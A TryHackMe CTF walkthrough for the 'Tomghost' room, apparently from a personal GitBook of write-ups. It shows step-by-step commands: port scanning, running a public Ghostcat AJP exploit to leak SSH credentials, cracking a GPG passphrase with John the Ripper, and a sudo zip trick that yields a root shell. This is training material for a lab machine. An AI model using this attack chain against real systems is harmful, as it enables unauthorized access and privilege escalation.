📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Reconnaissance
  • Enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

Tomghost

PreviousWgel CTFNextToolsRus

Last updated 3 years ago

Was this helpful?

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.193.3

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,53,8009,8080

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,53,8009,8080 -oN nmap 10.10.193.3

Enumeration

Lets visit the webserver on port 8080.

Its an Apache Tomcat/9.0.30 service page, we can't find anything interesting on this page.

Lets look at the service running on port 8009 which is ajp13, a binary protocol that allows to reverse proxying requests from a Web Server to a Application Server. Lets look for exploits on this service.

searchsploit ajp

The second exploit in this list is just what we are working for, so lets read the exploit and look at how to use it, to do this we need to copy the exploit to our directory.

searchsploit -m multiple/webapps/48143.py

Exploitation

Looking at the exploit, it just looks like we need to run the exploit against the IP of the target machine.

python 48143.py 10.10.193.3

And we found credentials, we can use these to login through ssh.

ssh skyfuck@10.10.193.3

We can read the user file which can be found with this command

find / -type f -name user.txt 2>/dev/null

Privilege Escalation

Looking in the current directory we are in there are two files.

One is credential.pgp which is a encrypted pgp (Pretty good privacy) file. The other is tryhackme.asc which is a ASCII armour file.

First we need to import the asc file and then decrypt the credential.pgp file.

gpg --import tryhackme.asc
gpg --decrypt credential.pgp 

It looks like we need a password so lets first copy this file to our machine and then crack the password using Johntheripper.

scp skyfuck@10.10.193.3:/home/skyfuck/tryhackme.asc .

Next we need to find the hash using gpg2john and then crack it using john.

gpg2john tryhackme.asc > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

After cracking it you get the password alexandru

Now you can decrypt the pgp file.

gpg --decrypt credential.pgp

We found credentials to another user, lets switch users to merlin.

su merlin

Lets run sudo -l to see what we can run as root.

sudo -l

Once we run these commands we get root.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

We are now root and now we can read root.txt and answer the last question of this room.

Looks like we can run /usr/bin/zip so lets go to and look for the commands to privilege escalate to root.

GTFOBins